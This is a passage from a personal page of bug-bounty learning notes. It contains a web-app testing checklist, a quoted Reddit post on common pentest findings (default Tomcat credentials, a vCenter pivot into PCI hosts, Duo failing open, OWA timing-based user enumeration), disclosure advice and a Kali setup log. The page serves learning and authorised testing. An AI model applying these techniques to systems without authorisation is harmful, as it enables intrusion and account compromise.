  2. Scan those specific functions with Burp's built-in scanner.

  3. Check your cookie, log out, check cookie, log in, check cookie. Submit old cookie, see if access.

  4. Perform user enumeration checks on login, registration, and password reset.

  5. Do a reset and see if: the password comes plaintext, uses a URL based token, is predictable, can be used multiple times, or logs you in automatically.

  6. Find numeric account identifiers anywhere in URLs and rotate them for context change.

  7. Find the security-sensitive function(s) or files and see if vulnerable to non-auth browsing (IDORs), lower-auth browsing, CSRF, CSRF protection bypass, and see if they can be done over HTTP.

  8. Directory brute for top short list on SecLists.

  9. Check upload functions for alternate file types that can execute code (XSS or PHP etc).



From /u/Metasploit-Ninja on reddit 1/2019:

Re: misconfigurations:

For pentesting, the vast majority of findings you come across are misconfigurations. Could be screw ups in group policy or bad password policies, etc but I see a lot of things like default creds for web instances like Apache Tomcat (tomcat:tomcat or admin:admin), etc.

I also see a lot of misconfigurations in Vmware Enterprise setups where a customer will have a PCI-DSS/CDE network that is supposed to be segmented from the regular enterprise/production network but isn't fully. For example, there might be a vSphere/vCenter instance that connects to all the VMware Hosts and the customer might have a host for just PCI and others for their regular production network but the vCenter/vSphere can connect to all of them. So if you compromised credentials like a VMware admin in the regular production network, you can just use vCenter/vSphere to jump into a PCI/CDE host then compromise the VMs or even take a snapshot of the VMs you want and download them from the datastore. I see this in a LOT of different places and people don't even think about it. They just see how info flows physically and logically but not how it flows virtually.

Also, I'll see two-factor setups with things like 2FA Duo where they have it set to "open" if the user getting the 2FA request doesn't press anything. This is because Duo communicates via cloud and if something happens to the connection, you can't login to critical systems so by default it fails open. If you have a fairly stable connection, you wouldn't want it that way. If an attacker gets creds and tries to login lets say at 3am and you are sleeping, it would time out and they would then get in without you pressing anything. Oops.

I also see a lot of OWA instances where you can enumerate users because of timing attack vulnerabilities associated with their instance. For example, if you gather a list of users from LinkedIn, social media sites, Google, etc, you can create a list and throw it against the OWA server and if the user is actually present, it will usually respond back with a valid/invalid error after 0.2 seconds. If the user doesn't exist in Active Directory, it will respond back after ~13-15 seconds. See Metasploit module auxiliary/scanner/http/owa_login for info on that and options.

I could go on but those are common ones I see all the time.



Sean's "One company: 262 bugs, 100% acceptance, 2.57 priority, millions of user details saved"
Craig Hays' "Bug Bounty Hunting Tips #1 - Always read the source code"
EdOverflow / bugbounty-cheatsheet / bugbountytips.md
Bugcrowd forum discussion "How do you approach a target?"
Jean Fleury's "So You Want To Become a Bug Bounty Hunter?"
Aakash Choudhary's "Bug-Hunting-Tips/Tricks"







Miscellaneous



Lots of hackers and bounty-hunters are on Twitter; that seems to be the standard way to communicate. But I don't like Twitter, and I have no need to get the latest news right away. Better to read articles and books and documentation, learn tools and techniques, try challenges.



If you find a bug by accident:

If you're not in a bug-bounty program (maybe the company doesn't even have such a program), and you find a serious security bug:

Do NOT just release the bug information into the wild.

If you actively worked to find the vulnerability, you may have violated the law.

See Reporting section for advice about replicating and documenting the bug.


Contacting the company:
Make sure you really ARE talking to a company representative. Don't just report to some guy who pops up on reddit or something saying "yeah, I'm from company X, tell me all about the vulnerability".

One way to verify a contact if you're not sure: get them to put some hidden file (containing a code you give them) on the company's main web site.

The company may accept the report gracefully, or they may be hostile and/or call law-enforcement.

Instead of contacting the company directly, you could contact:

New process for open-source components: Bruce Mayhew's "Sonatype and HackerOne eliminate the pain of reporting open source software vulnerabilities"


Things probably will go smoother if you don't ask for money, just leave it up to the company to decide if they want to reward you. If you do ask for money, keep the amount reasonable. But whichever way you decide, I would be open about that pretty early in the process, as soon as you get into contact with security-type people.

Don't expect an instant response. You're an unknown guy coming in on a non-standard channel, not part of any program. They see a lot of scammers and false alarms, and they're busy with other work.



Questions/issues:




Done so far:
  1. Started 12/2018. Tons of reading.

  2. Made a live-session Kali image on USB flash drive:

    1. Downloaded Kali 2018.4 ISO and used Mint "Disks" app to write to flash drive.

    2. Added persistence by doing in CLI (per Kali Linux Live USB Persistence):
      
      end=7gb
      read start _ < <(du -bcm kali-linux-2018.4-amd64.iso | tail -1); echo $start
      sudo parted /dev/sdc mkpart primary $start $end
      sudo mkfs.ext3 -L persistence /dev/sdc3
      sudo e2label /dev/sdc3 persistence
      sudo mkdir -p /mnt/my_usb
      sudo mount /dev/sdc3 /mnt/my_usb
      cd /mnt/my_usb
      # had to do   sudo chmod 777 .   to make next line work
      sudo echo "/ union" >persistence.conf
      # sudo chmod 755 .   to restore permissions to original
      cd ~
      sudo umount /dev/sdc3
      

  3. Booted from Kali live session USB, selecting "Live (forensic mode)", which means hard disk will not be touched. Booting got stuck for a couple of minutes waiting for "LSB - thin initscript". Login password is "toor", but I wasn't asked for it.

    Distro has lots of tools installed; doesn't have OpenVAS. Has Burp Community Edition.

  4. Tested, and "Live (forensic mode)" doesn't have persistence. "Live with persistence" mode does have persistence. Both modes usually spend minutes waiting for "LSB - thin initscript" at boot time.

  5. Was going to install OpenVAS on Kali, but the live session is just too slow at everything.

  6. Tried to install OpenVAS on my normal Mint desktop; see OpenVAS section. Finally gave up.

  7. Joined HackerOne and Bugcrowd.

  8. Installed Burp Suite CE and got the basics working.

  9. More tons of reading.

  10. Upgraded my laptop's RAM from 3 GB to 8 GB, so I can run VMs etc. And just have a faster machine in general.

  11. Installed VirtualBox and a Xubuntu VM and learned a bit about that.

  12. Tried to install Dradis, got stuck. Support not helpful.

  13. Started doing challenges on hacker101, quickly got stuck and feeling like an idiot. Worked through it over the next week or so, skipping to other challenges when I got stuck.

  14. Installed OWASP ZAP and got the basics working.

  15. 2/2019: Did some Hacker101 CTF's and got to a level where I got an invitation from a private program. It was a VDP (no money) program. Declined invitation because I think my skills are not good enough yet.

  16. Started on OverTheWire Bandit, got stuck at 21, trying to find port something is listening on.

  17. 3/2019: Got sidetracked into creating a desktop app to do bounty-hunting project management. I want the app, but also it's an excuse to learn Bootstrap, ng-bootstrap, Angular, Electron, (already knew a bit about) Node.js, (already knew a bit about) SQL.

  18. Gave up on app development in Angular, changed to Java.

  19. Started on Portswigger's "Web Security Academy"






Bookmark and Share

Home     Site Map

Privacy policy